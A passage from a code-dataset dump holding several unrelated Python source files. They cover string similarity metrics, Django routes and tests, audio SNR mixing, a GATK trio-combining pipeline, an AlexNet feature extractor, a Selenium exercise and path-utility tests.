re.match('\\\\d{2}[-\\\\.\\\\\\\\]\\\\d{1,2}[-\\\\.\\\\\\\\]\\\\d{1,2}', date_str):\n p = re.compile('\\\\d+')\n splitted_date = p.findall(date_str)\n if int(splitted_date[0]) < 32 and int(splitted_date[1]) < 13:\n return datetime.datetime.strptime(date_str, '%d' + separator + '%m' + separator + '%y').date()\n if int(splitted_date[0]) > 32:\n return datetime.datetime.strptime(date_str, '%y' + separator + '%m' + separator + '%d').date()\n try:\n return datetime.datetime.strptime(date_str, '%d' + separator + '%m' + separator + '%y').date()\n except:\n try:\n return datetime.datetime.strptime(date_str, '%y' + separator + '%m' + separator + '%d').date()\n except:\n display('Unknown pattern or invalid date: %s' % date_str)\n return None\n\n else:\n return parse(date_str, fuzzy=True)\n except:\n f = open('unparseddates.txt', 'a')\n f.write(date_str + '\\n')\n f.close()\n return None\n\n\ndef get_num_equal(num1, num2):\n if num1 == 'nan' or num2 == 'nan' or num1 == '' or num2 == '':\n return -1.0\n try:\n num1_ = float(num1)\n num2_ = float(num2)\n if num1_ == num2_:\n return 1.0\n return 0.0\n except:\n return -1\n\ndef get_norm_sim(num1,num2,max_value, min_value):\n if num1 == 'nan' or num2 == 'nan' or num1 == '' or num2 == '':\n return -1.0\n try:\n num1_ = float(num1)\n num2_ = float(num2)\n abs_difference = abs(num1_ - num2_)\n return 1-(abs(abs_difference - min_value)/(max_value-min_value))\n except:\n return -1\n\ndef get_abs_diff(num1, num2):\n if num1 == 'nan' or num2 == 'nan' or num1 == '' or num2 == '':\n return -1.0\n try:\n num1_ = float(num1)\n num2_ = float(num2)\n return abs(num1_ - num2_)\n except:\n return -1\n\ndef get_jaccard_token_sim(str1, str2):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n else:\n return 1-nltk.jaccard_distance(set(str1), set(str2))\n \n \ndef get_jaccard_sim(str1, str2):\n a = set(str1.split())\n b = set(str2.split())\n c = a.intersection(b)\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n else:\n return float(len(c)) / float(len(a) + len(b) - len(c))\n\n\ndef get_relaxed_jaccard_sim(str1, str2, n_grams=1):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '' :\n return -1.0\n a = set(str1.split())\n b = set(str2.split())\n if not a or not b: return -1\n c = []\n for a_ in a:\n for b_ in b:\n if get_levenshtein_sim(a_, b_) > 0.7:\n c.append(a_)\n intersection = len(c)\n min_length = min(len(a), len(b))\n if intersection > min_length:\n intersection = min_length\n return float(intersection) / float(len(a) + len(b) - intersection)\n\n\ndef get_containment_sim(str1, str2, allowTokenBased= True):\n #it's not really a long string necessarily but it does not make sense to do word based containment\n if ((len(set(str1.split()))>1 and len(set(str2.split()))>1) or not allowTokenBased): \n a = set(str1.split())\n b = set(str2.split())\n else: #for single words we consider the tokens\n if (allowTokenBased):\n a = set(str1)\n b = set(str2)\n \n \n c = a.intersection(b)\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n elif len(a) == 0 or len(b) == 0:\n return -1.0\n else:\n return float(len(c)) / float(min(len(a), len(b)))\n\n\ndef get_levenshtein_sim(str1, str2):\n levenshtein = Levenshtein()\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n else:\n max_length = max(len(str1), len(str2))\n return 1.0 - levenshtein.distance(str1, str2) / max_length\n\n\ndef get_missing(str1, str2):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '' :\n return 1.0\n else:\n return 0.0\n\n\ndef get_overlap_sim(str1, str2):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n elif str1 == str2:\n return 1.0\n else:\n return 0.0\n\n\ndef get_cosine_word2vec(str1, str2, model):\n if str1 == 'nan' or str2 == 'nan' or str1 == '' or str2 == '':\n return -1.0\n elif str1.replace(' ', '') in model.vocab and str2.replace(' ', '') in model.vocab:\n return model.similarity(str1.replace(' ', ''), str2.replace(' ', ''))\n else:\n return 0.0\n\n\ndef get_cosine_tfidf(tfidf_scores_ids, sourceID, targetID):\n try:\n source_index = np.where(tfidf_scores_ids['ids'] == sourceID)\n target_index = np.where(tfidf_scores_ids['ids'] == targetID)\n score = cosine_similarity(tfidf_scores_ids['scores'][source_index].todense(), tfidf_scores_ids['scores'][target_index].todense())\n except:\n import pdb; pdb.set_trace();\n return score[0][0]\n \n\ndef calculateTFIDF(records, grams=1): \n try:\n records_data = records['data']\n concat_records = []\n for row in records_data:\n if (isinstance(row,np.ndarray)): # tfidf based on more that one features\n concat_row = ''\n for value in row:\n if not pd.isnull(value):\n if type(value) is str:\n if value.lower() != 'nan':\n value = re.sub('[^A-Za-z0-9\\s\\t\\n]+', '', str(value)) #think of product model names e.g. ak-123\n concat_row += ' ' + value\n else: # tfidf based on one feature \n value = re.sub('[^A-Za-z0-9\\s\\t\\n]+', '', str(value))\n concat_row += ' ' + str(value)\n\n concat_records.append(concat_row.lower())\n else: \n if pd.isnull(row):\n concat_records.append(\"\")\n else:\n value = re.sub('[^A-Za-z0-9\\s\\t\\n]+', '', str(row))\n concat_records.append(value.lower())\n\n tf_idfscores = TfidfVectorizer(encoding='latin-1', ngram_range=(grams,grams)).fit_transform(concat_records)\n tf_idf = dict()\n tf_idf['ids'] = records['ids']\n tf_idf['scores'] = tf_idfscores\n except Exception as e:\n print(str(e))\n import pdb;pdb.set_trace();\n return tf_idf\n","sub_path":"code/similarityutils.py","file_name":"similarityutils.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"194163444","text":"from django.urls import path\nfrom .views.provider.views import *\nfrom .views.product.views import *\nfrom .views.purchase.views import *\nfrom .views.inventory.views import *\n\nurlpatterns = [\n # provider\n path('provider/', ProviderListView.as_view(), name='provider_list'),\n path('provider/add/', ProviderCreateView.as_view(), name='provider_create'),\n path('provider/update//', ProviderUpdateView.as_view(), name='provider_update'),\n path('provider/delete//', ProviderDeleteView.as_view(), name='provider_delete'),\n # product\n path('product/', ProductListView.as_view(), name='product_list'),\n path('product/add/', ProductCreateView.as_view(), name='product_create'),\n path('product/update//', ProductUpdateView.as_view(), name='product_update'),\n path('product/delete//', ProductDeleteView.as_view(), name='product_delete'),\n # purchases\n path('purchase/', PurchaseListView.as_view(), name='purchase_list'),\n path('purchase/add/', PurchaseCreateView.as_view(), name='purchase_create'),\n path('purchase/delete//', PurchaseDeleteView.as_view(), name='purchase_delete'),\n # inventory\n path('inventory/', InventoryListView.as_view(), name='inventory_list'),\n]\n","sub_path":"app/core/erp/scm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"219204161","text":"from test_base import MainTestCase\nfrom main.models import MetaData\nfrom main.views import show, edit, download_metadata\nfrom django.core.urlresolvers import reverse\nimport os\n\nclass TestFormMetadata(MainTestCase):\n\n def setUp(self):\n MainTestCase.setUp(self)\n self._create_user_and_login()\n self._publish_transportation_form_and_submit_instance()\n self.url = reverse(show, kwargs={\n 'username': self.user.username,\n 'id_string': self.xform.id_string\n })\n self.edit_url = reverse(edit, kwargs={\n 'username': self.user.username,\n 'id_string': self.xform.id_string\n })\n\n def _add_metadata(self, data_type='doc'):\n name = 'transportation.xls'\n path = os.path.join(self.this_directory, \"fixtures\",\n \"transportation\", name)\n with open(path) as doc_file:\n post_data = {}\n post_data[data_type] = doc_file\n response = self.client.post(self.edit_url, post_data)\n self.doc = MetaData.objects.all().reverse()[0]\n self.doc_url = reverse(download_metadata, kwargs={\n 'username': self.user.username,\n 'id_string': self.xform.id_string,\n 'data_id': self.doc.id})\n return name\n\n def test_adds_supporting_doc_on_submit(self):\n count = len(MetaData.objects.filter(xform=self.xform,\n data_type='supporting_doc'))\n name = self._add_metadata()\n self.assertEquals(count + 1, len(\n MetaData.objects.filter(xform=self.xform,\n data_type='supporting_doc')))\n\n def test_shows_supporting_doc_after_submit(self):\n name = self._add_metadata()\n response = self.client.get(self.url)\n self.assertContains(response, name)\n self.xform.shared = True\n self.xform.save()\n response = self.anon.get(self.url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, name)\n\n def test_download_supporting_doc(self):\n name = self._add_metadata()\n response = self.client.get(self.doc_url)\n self.assertEqual(response.status_code, 200)\n\n def test_no_download_supporting_doc_for_anon(self):\n name = self._add_metadata()\n response = self.anon.get(self.doc_url)\n self.assertEqual(response.status_code, 403)\n\n def test_shared_download_supporting_doc_for_anon(self):\n name = self._add_metadata()\n self.xform.shared = True\n self.xform.save()\n response = self.anon.get(self.doc_url)\n self.assertEqual(response.status_code, 200)\n\n def test_user_source_edit_updates(self):\n desc = 'Snooky'\n response = self.client.post(self.edit_url, {'source': desc},\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(MetaData.source(self.xform).data_value, desc)\n\n def test_upload_source_file(self):\n name = self._add_metadata('source')\n self.assertNotEqual(MetaData.source(self.xform).data_file, None)\n\n def test_upload_source_file_set_value_to_name(self):\n name = self._add_metadata('source')\n self.assertEqual(MetaData.source(self.xform).data_value, name)\n\n def test_upload_source_file_keep_name(self):\n desc = 'Snooky'\n response = self.client.post(self.edit_url, {'source': desc},\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(response.status_code, 200)\n name = self._add_metadata('source')\n self.assertNotEqual(MetaData.source(self.xform).data_file, None)\n self.assertEqual(MetaData.source(self.xform).data_value, desc)\n","sub_path":"main/tests/test_form_metadata.py","file_name":"test_form_metadata.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"651327427","text":"import os\nimport sys\nimport librosa\nimport soundfile\nfrom datetime import datetime\nimport tensorflow as tf\n\n\nSR_TARGET = 16000\nMIXED_DIR = os.path.join(\"data\", \"mixed\")\nif not os.path.exists(MIXED_DIR):\n os.makedirs(MIXED_DIR)\n\n\ndef parse_args():\n speech_file = os.path.join(\"data\", \"speech\", \"mic_F04_si1021.wav\")\n noise_file = os.path.join(\"data\", \"noise\", \"doesnotexist.wav\")\n snr_targets = list(range(-10, 26, 5))\n if len(sys.argv) > 3:\n speech_file = sys.argv[1]\n noise_file = sys.argv[2]\n snr_targets = [int(i) for i in sys.argv[3:]]\n return speech_file, noise_file, snr_targets\n\n\ndef mix_noise_speech(speech_path, noise_path, snr_target):\n # Load wav files\n speech, sr_speech = librosa.load(path=speech_path, sr=SR_TARGET, mono=True)\n noise, sr_noise = librosa.load(path=noise_path, sr=SR_TARGET, mono=True)\n\n # Mix speech with noise\n speech_pow = tf.math.reduce_euclidean_norm(speech)\n noise_pow = tf.math.reduce_euclidean_norm(noise)\n snr_current = 20.0 * tf.math.log(speech_pow / noise_pow) / tf.math.log(10.0)\n noise_snr_adjusted = noise * tf.math.pow(10.0, (snr_current - snr_target) / 20.0)\n length = min(len(speech), len(noise_snr_adjusted))\n noisy_speech = speech[-length:] + noise_snr_adjusted[-length:]\n\n # Write out mixed audio to file\n out_path = os.path.join(\n MIXED_DIR,\n f'{datetime.now().strftime(\"%Y%m%d-%H%M%S\")}_mixed_snr_{snr_target}.wav',\n )\n print(f\"Mixed file written to {out_path}\")\n soundfile.write(\n file=out_path,\n data=noisy_speech,\n samplerate=SR_TARGET,\n format=\"WAV\",\n subtype=\"PCM_16\",\n )\n\n\ndef main():\n speech_file, noise_file, snr_targets = parse_args()\n for snr in snr_targets:\n mix_noise_speech(speech_file, noise_file, snr)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/snr_tester/snr_tester.py","file_name":"snr_tester.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"491914599","text":"from limite.tela_poltrona import TelaPoltrona\nfrom entidade.poltrona import Poltrona\n\n\nclass ControladorPoltronas:\n\n\tdef __init__(self, controlador_sistema):\n\t\tself.__controlador_sistema = controlador_sistema\n\t\tself.__poltronas = []\n\t\tself.__tela_poltrona = TelaPoltrona()\n\t\tself.__contador = 0\n\n\tdef pega_poltrona_por_id(self, id_poltrona: int):\n\t\tfor poltrona in self.__poltronas:\n\t\t\tif poltrona.id_poltrona == id_poltrona:\n\t\t\t\treturn poltrona\n\t\treturn None\n\n\tdef retornar(self):\n\t\tself.__controlador_sistema.abre_tela()\n\n\tdef incluir_poltrona(self):\n\t\tdados_poltrona = self.__tela_poltrona.pega_dados_poltrona()\n\t\tpoltrona = Poltrona(\n\t\t\tself.__contador+1,\n\t\t\tdados_poltrona[\"fileira\"],\n\t\t\tdados_poltrona[\"acento\"]\n\t\t)\n\t\tself.__poltronas.append(poltrona)\n\t\tself.__contador += 1\n\n\tdef alterar_poltrona(self):\n\t\tself.lista_poltronas()\n\n\t\tif len(self.__poltronas) > 0:\n\n\t\t\tid_poltrona = self.__tela_poltrona.seleciona_poltrona()\n\t\t\tpoltrona = self.pega_poltrona_por_id(int(id_poltrona))\n\n\t\t\tif poltrona is not None:\n\t\t\t\tnovos_dados_poltrona = self.__tela_poltrona.pega_dados_poltrona()\n\t\t\t\tpoltrona.fileira = novos_dados_poltrona[\"fileira\"]\n\t\t\t\tpoltrona.acento = novos_dados_poltrona[\"acento\"]\n\t\t\t\tself.lista_poltronas()\n\t\t\telse:\n\t\t\t\tself.__tela_poltrona.mostra_mensagem(\n\t\t\t\t\t\"ATENÇÃO: poltrona não existente\"\n\t\t\t\t)\n\t\telse:\n\t\t\tpass # já está mostrando a mensagem na listagem de poltronas, por isso que não estou printando novamente\n\n\tdef lista_poltronas(self):\n\t\tself.__tela_poltrona.mostra_mensagem(\"\\n\\033[1;96m-------==X( LISTA POLTRONAS )X==-------\\033[0;0m\")\n\n\t\tif len(self.__poltronas) > 0:\n\t\t\tfor poltrona in self.__poltronas:\n\t\t\t\tself.__tela_poltrona.mostra_poltrona({\n\t\t\t\t\t\"fileira\": poltrona.fileira,\n\t\t\t\t\t\"acento\": poltrona.acento,\n\t\t\t\t\t\"id_poltrona\": poltrona.id_poltrona\n\t\t\t\t})\n\t\telse:\n\t\t\tself.__tela_poltrona.mostra_mensagem('\\033[1;31mNão há poltronas disponíveis, crie uma antes.\\033[0;0m')\n\n\tdef excluir_poltrona(self):\n\n\t\tself.lista_poltronas()\n\n\t\tif len(self.__poltronas) > 0:\n\n\t\t\tid_poltrona = self.__tela_poltrona.seleciona_poltrona()\n\t\t\tpoltrona = self.pega_poltrona_por_id(int(id_poltrona))\n\n\t\t\tif poltrona is not None:\n\t\t\t\tself.__poltronas.remove(poltrona)\n\t\t\t\tself.lista_poltronas()\n\t\t\telse:\n\t\t\t\tself.__tela_poltrona.mostra_mensagem(\n\t\t\t\t\t\"ATENÇÃO: poltrona não existente\"\n\t\t\t\t)\n\t\telse:\n\t\t\tpass # já está mostrando a mensagem na listagem de poltronas, por isso que não estou printando novamente\n\n\tdef abre_tela(self):\n\t\tlista_opcoes = {\n\t\t\t0: self.retornar,\n\t\t\t1: self.incluir_poltrona,\n\t\t\t2: self.alterar_poltrona,\n\t\t\t3: self.lista_poltronas,\n\t\t\t4: self.excluir_poltrona\n\t\t}\n\n\t\twhile True:\n\t\t\tlista_opcoes[self.__tela_poltrona.tela_opcoes()]()\n\n\t@property\n\tdef poltronas(self):\n\t\treturn self.__poltronas","sub_path":"controle/controlador_poltronas.py","file_name":"controlador_poltronas.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"421030953","text":"# global\n\n\n\nNames=['敌法师', '斧王', '祸乱之源', '嗜血狂魔', '水晶室女', '卓尔游侠', '撼地者',\n '主宰', '米拉娜', '变体精灵', '影魔', '幻影长矛手', '帕克', '帕吉', '剃刀',\n '沙王', '风暴之灵', '斯温', '小小', '复仇之魂', '风行者', '宙斯', '昆卡',\n '莉娜', '莱恩', '暗影萨满', '斯拉达', '潮汐猎人', '巫医', '巫妖', '力丸',\n '谜团', '修补匠', '狙击手', '瘟疫法师', '术士', '兽王', '痛苦女王', '剧毒术士',\n '虚空假面', '冥魂大帝', '死亡先知', '幻影刺客', '帕格纳', '圣堂刺客', '冥界亚龙',\n '露娜', '龙骑士', '戴泽', '发条技师', '拉席克', '先知', '噬魂鬼', '黑暗贤者',\n '克林克兹', '全能骑士', '魅惑魔女', '哈斯卡', '暗夜魔王', '育母蜘蛛', '赏金猎人',\n '编织者', '杰奇洛', '蝙蝠骑士', '陈', '幽鬼', '远古冰魄', '末日使者', '熊战士',\n '裂魂人', '矮人直升机', '炼金术士', '祈求者', '沉默术士', '殁境神蚀者', '狼人',\n '酒仙', '暗影恶魔', '德鲁伊', '混沌骑士', '米波', '树精卫士', '食人魔魔法师',\n '不朽尸王', '拉比克', '干扰者', '司夜刺客', '娜迦海妖', '光之守卫', '艾欧',\n '维萨吉', '斯拉克', '美杜莎', '巨魔战将', '半人马战行者', '马格纳斯', '伐木机',\n '钢背兽', '巨牙海民', '天怒法师', '亚巴顿', '上古巨神', '军团指挥官', '工程师',\n '灰烬之灵', '大地之灵', '孽主', '恐怖利刃', '凤凰', '神谕者', '寒冬飞龙', '天穹守望者']\n\n\nColumn1='英雄'\n\nColumn2='胜率'\n\nColumn3='使用频率'\n\n","sub_path":"scripts/HeroList.py","file_name":"HeroList.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"4180398","text":"import gzip\nimport re\nimport os\nimport time\nfrom sys import argv\nimport concurrent.futures\n\nstartTime = time.time()\nchar = '\\n' + ('*' * 70) + '\\n'\n\n#Input file or list of files\ninputFile = argv[1]\n\n#Create a dictionary of files that need to be combined into one vcf file\nfileDict = {}\nwith open(inputFile) as sampleFile:\n header = sampleFile.readline()\n headerList = header.rstrip().split(\"\\t\")\n fileNameIndex = headerList.index(\"file_name\")\n familyIdIndex = headerList.index(\"family_id\")\n for sample in sampleFile:\n sampleData = sample.rstrip(\"\\n\").split(\"\\t\")\n fileName = sampleData[fileNameIndex]\n sampleFamilyId = sampleData[familyIdIndex]\n shortName = re.findall(r\"([\\w\\-/]+)\\.?.*\\.?.*\\.gz\", fileName)[0]\n actualFileName = \"{}_test/{}_parsed.vcf.gz\".format(sampleFamilyId, shortName)\n if sampleFamilyId not in fileDict:\n fileDict[sampleFamilyId] = [actualFileName]\n else:\n fileDict[sampleFamilyId].append(actualFileName)\n\nprobandDict = {}\nparentDict = {}\nwith open(inputFile) as sampleFile:\n header = sampleFile.readline()\n headerList = header.rstrip().split(\"\\t\")\n fileNameIndex = headerList.index(\"file_name\")\n familyIdIndex = headerList.index(\"family_id\")\n sampleIdIndex = headerList.index(\"sample_id\")\n probandIndex = headerList.index(\"proband\")\n genderIndex = headerList.index(\"sex\")\n for sample in sampleFile:\n sampleData = sample.rstrip(\"\\n\").split(\"\\t\")\n fileName = sampleData[fileNameIndex]\n sampleFamilyId = sampleData[familyIdIndex]\n sampleId = sampleData[sampleIdIndex]\n probandStatus = sampleData[probandIndex]\n gender = sampleData[genderIndex]\n shortName = re.findall(r\"([\\w\\-/]+)\\.?.*\\.?.*\\.gz\", fileName)[0]\n actualFileName = \"{}_test/{}_parsed.vcf.gz\".format(sampleFamilyId, shortName)\n if probandStatus == \"Yes\":\n probandDict[sampleId] = sampleFamilyId\n else:\n if sampleFamilyId not in parentDict:\n parentDict[sampleFamilyId] = {sampleId: gender}\n else:\n parentDict[sampleFamilyId][sampleId] = gender\n\n# Create fam files\ndef createFamFiles(proband):\n familyId = probandDict[proband]\n familyDict = parentDict[familyId]\n paternal = \"\"\n maternal = \"\"\n outputString = \"\"\n sampleDict = {}\n for key, value in familyDict.items():\n if value == \"1\":\n paternal = key\n else:\n maternal = key\n with open(inputFile) as sampleFile:\n header = sampleFile.readline()\n headerList = header.rstrip().split(\"\\t\")\n fileNameIndex = headerList.index(\"file_name\")\n familyIdIndex = headerList.index(\"family_id\")\n sampleIdIndex = headerList.index(\"sample_id\")\n probandIndex = headerList.index(\"proband\")\n genderIndex = headerList.index(\"sex\")\n for sample in sampleFile:\n sampleData = sample.rstrip(\"\\n\").split(\"\\t\")\n fileName = sampleData[fileNameIndex]\n sampleFamilyId = sampleData[familyIdIndex]\n sampleId = sampleData[sampleIdIndex]\n probandStatus = sampleData[probandIndex]\n gender = sampleData[genderIndex]\n if probandStatus == \"Yes\" and familyId == sampleFamilyId:\n sampleDict[sampleId] = \"{}\\t{}\\t{}\\t{}\\t{}\\t2\\n\".format(sampleFamilyId, sampleId, paternal, maternal, gender)\n elif probandStatus == \"No\" and familyId == sampleFamilyId:\n sampleDict[sampleId] = \"{}\\t{}\\t0\\t0\\t{}\\t1\\n\".format(sampleFamilyId, sampleId, gender)\n with open(\"{}_test/{}.fam\".format(familyId, familyId), \"w\") as outputFile:\n for key, value in sorted(sampleDict.items()):\n outputFile.write(value)\n\nwith concurrent.futures.ProcessPoolExecutor(max_workers=24) as executor:\n executor.map(createFamFiles, probandDict)\n\nfilesToGenotype = []\n# Use GATK to combine all trios into one vcf\ndef combineTrios(trio):\n files = fileDict[trio]\n fileString = \"\"\n outputName = \"{}_test/{}.vcf.gz\".format(trio, trio)\n for file in files:\n fileString += \"-V {} \".format(file)\n os.system(\"gatk IndexFeatureFile -F {}\".format(file))\n os.system(\"gatk CombineGVCFs -R /references/Homo_sapiens_assembly38.fasta {} -O {}\".format(fileString, outputName))\n return(outputName)\nwith concurrent.futures.ProcessPoolExecutor(max_workers=24) as executor:\n outputName = executor.map(combineTrios, fileDict)\n for file in outputName:\n filesToGenotype.append(file)\n\ntimeElapsedMinutes = round((time.time()-startTime) / 60, 2)\ntimeElapsedHours = round(timeElapsedMinutes / 60, 2)\nprint('{}Trios have been combined. Time elapsed: {} minutes ({} hours){}'.format(char, timeElapsedMinutes, timeElapsedHours, char))","sub_path":"combine_trios.py","file_name":"combine_trios.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"188537540","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torchvision\nfrom torchvision import models\nfrom torch.autograd import Variable\n\nfrom mmodel.basic_module import WeightedModule\n\n\ndef init_weights(m):\n classname = m.__class__.__name__\n if (\n classname.find(\"Conv2d\") != -1\n or classname.find(\"ConvTranspose2d\") != -1\n ):\n nn.init.kaiming_uniform_(m.weight)\n nn.init.constant_(m.bias, 0)\n elif classname.find(\"BatchNorm\") != -1:\n nn.init.normal_(m.weight, 1.0, 0.02)\n nn.init.constant_(m.bias, 0)\n elif classname.find(\"Linear\") != -1:\n nn.init.xavier_normal_(m.weight)\n nn.init.constant_(m.bias, 0)\n\n\nclass LRN(nn.Module):\n def __init__(\n self, local_size=1, alpha=1.0, beta=0.75, ACROSS_CHANNELS=True\n ):\n super(LRN, self).__init__()\n self.ACROSS_CHANNELS = ACROSS_CHANNELS\n if ACROSS_CHANNELS:\n self.average = nn.AvgPool3d(\n kernel_size=(local_size, 1, 1),\n stride=1,\n padding=(int((local_size - 1.0) / 2), 0, 0),\n )\n else:\n self.average = nn.AvgPool2d(\n kernel_size=local_size,\n stride=1,\n padding=int((local_size - 1.0) / 2),\n )\n self.alpha = alpha\n self.beta = beta\n\n def forward(self, x):\n if self.ACROSS_CHANNELS:\n div = x.pow(2).unsqueeze(1)\n div = self.average(div).squeeze(1)\n div = div.mul(self.alpha).add(1.0).pow(self.beta)\n else:\n div = x.pow(2)\n div = self.average(div)\n div = div.mul(self.alpha).add(1.0).pow(self.beta)\n x = x.div(div)\n return x\n\n\nclass AlexNet(nn.Module):\n def __init__(self, num_classes=1000):\n super(AlexNet, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(3, 96, kernel_size=11, stride=4, padding=0),\n nn.ReLU(inplace=True),\n LRN(local_size=5, alpha=0.0001, beta=0.75),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(96, 256, kernel_size=5, padding=2, groups=2),\n nn.ReLU(inplace=True),\n LRN(local_size=5, alpha=0.0001, beta=0.75),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(256, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 384, kernel_size=3, padding=1, groups=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1, groups=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n self.classifier = nn.Sequential(\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 6 * 6)\n x = self.classifier(x)\n return x\n\n\ndef alexnet(pretrained=False, **kwargs):\n r\"\"\"AlexNet model architecture from the\n `\"One weird trick...\" `_ paper.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = AlexNet(**kwargs)\n if pretrained:\n model_path = \"./_PUBLIC_DATASET_/alexnet.pth.tar\"\n pretrained_model = torch.load(model_path)\n model.load_state_dict(pretrained_model[\"state_dict\"])\n return model\n\n\n# convnet without the last layer\nclass AlexNetFc(WeightedModule):\n def __init__(\n self,\n use_bottleneck=True,\n bottleneck_dim=256,\n new_cls=False,\n class_num=1000,\n ):\n super(AlexNetFc, self).__init__()\n model_alexnet = alexnet(pretrained=True)\n self.has_init = True\n self.features = model_alexnet.features\n self.classifier = nn.Sequential()\n for i in range(6):\n self.classifier.add_module(\n \"classifier\" + str(i), model_alexnet.classifier[i]\n )\n self.feature_layers = nn.Sequential(self.features, self.classifier)\n\n self.use_bottleneck = use_bottleneck\n self.new_cls = new_cls\n if new_cls:\n if self.use_bottleneck:\n self.bottleneck = nn.Linear(4096, bottleneck_dim)\n self.fc = nn.Linear(bottleneck_dim, class_num)\n self.bottleneck.apply(init_weights)\n self.fc.apply(init_weights)\n self.__in_features = bottleneck_dim\n else:\n self.fc = nn.Linear(4096, class_num)\n self.fc.apply(init_weights)\n self.__in_features = 4096\n else:\n self.fc = model_alexnet.classifier[6]\n self.__in_features = 4096\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.classifier(x)\n if self.use_bottleneck and self.new_cls:\n x = self.bottleneck(x)\n y = self.fc(x)\n return x, y\n\n\nclass AlexNetFeatureExtractor(WeightedModule):\n def __init__(self):\n super(AlexNetFeatureExtractor, self).__init__()\n\n model_alexnet = alexnet(pretrained=True)\n self.features = model_alexnet.features\n self.classifier = nn.Sequential()\n for i in range(6):\n self.classifier.add_module(\n \"classifier\" + str(i), model_alexnet.classifier[i]\n )\n\n self.output_dim = 4096\n self.has_init = True\n\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n feature = self.classifier(x)\n return feature\n\n","sub_path":"mmodel/utils/thuml_feature_extractor.py","file_name":"thuml_feature_extractor.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"80495828","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions\nimport math\nimport time\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\nbrowser = webdriver.Chrome()\nbrowser.get(\"http://suninjuly.github.io/explicit_wait2.html\")\n\n\nprice = WebDriverWait(browser, 12).until(\n expected_conditions.text_to_be_present_in_element((By.ID, \"price\"),'100')\n)\nbutton1 = browser.find_element(By.ID, \"book\")\nbutton1.click()\n\nelement = browser.find_element_by_id(\"input_value\")\nx = int(element.text)\ny = calc(x)\n\ninput = browser.find_element_by_id(\"answer\")\ninput.send_keys(y)\n\nbutton2 = browser.find_element(By.ID, \"solve\")\nbutton2.click()\n\ntime.sleep(30)\nbrowser.quit()\n","sub_path":"Selenium/block2/block2_lesson4_ex1.py","file_name":"block2_lesson4_ex1.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"143607111","text":"# coding: utf8\nfrom __future__ import unicode_literals\nimport re\n\nfrom six import text_type\n\nfrom clldutils.testing import WithTempDir, capture_all\n\n\nclass Tests(WithTempDir):\n def make_file(self, name):\n path = self.tmp_path(name)\n with path.open('w') as fp:\n fp.write('test')\n return path\n\n def test_import_module(self):\n from clldutils.path import import_module\n\n with self.tmp_path('__init__.py').open('w', encoding='ascii') as fp:\n fp.write('A = [1, 2, 3]')\n\n m = import_module(self.tmp_path())\n self.assertEqual(len(m.A), 3)\n\n with self.tmp_path('mod.py').open('w', encoding='ascii') as fp:\n fp.write('A = [1, 2, 3]')\n\n m = import_module(self.tmp_path('mod.py'))\n self.assertEqual(len(m.A), 3)\n\n def test_non_ascii(self):\n from clldutils.path import Path, path_component, as_unicode\n\n p = Path(path_component('äöü')).joinpath(path_component('äöü'))\n self.assertIsInstance(as_unicode(p), text_type)\n self.assertIsInstance(as_unicode(p.name), text_type)\n\n def test_as_posix(self):\n from clldutils.path import as_posix, Path\n\n self.assertRaises(ValueError, as_posix, 5)\n self.assertEquals(as_posix('.'), as_posix(Path('.')))\n\n def test_md5(self):\n from clldutils.path import md5\n\n 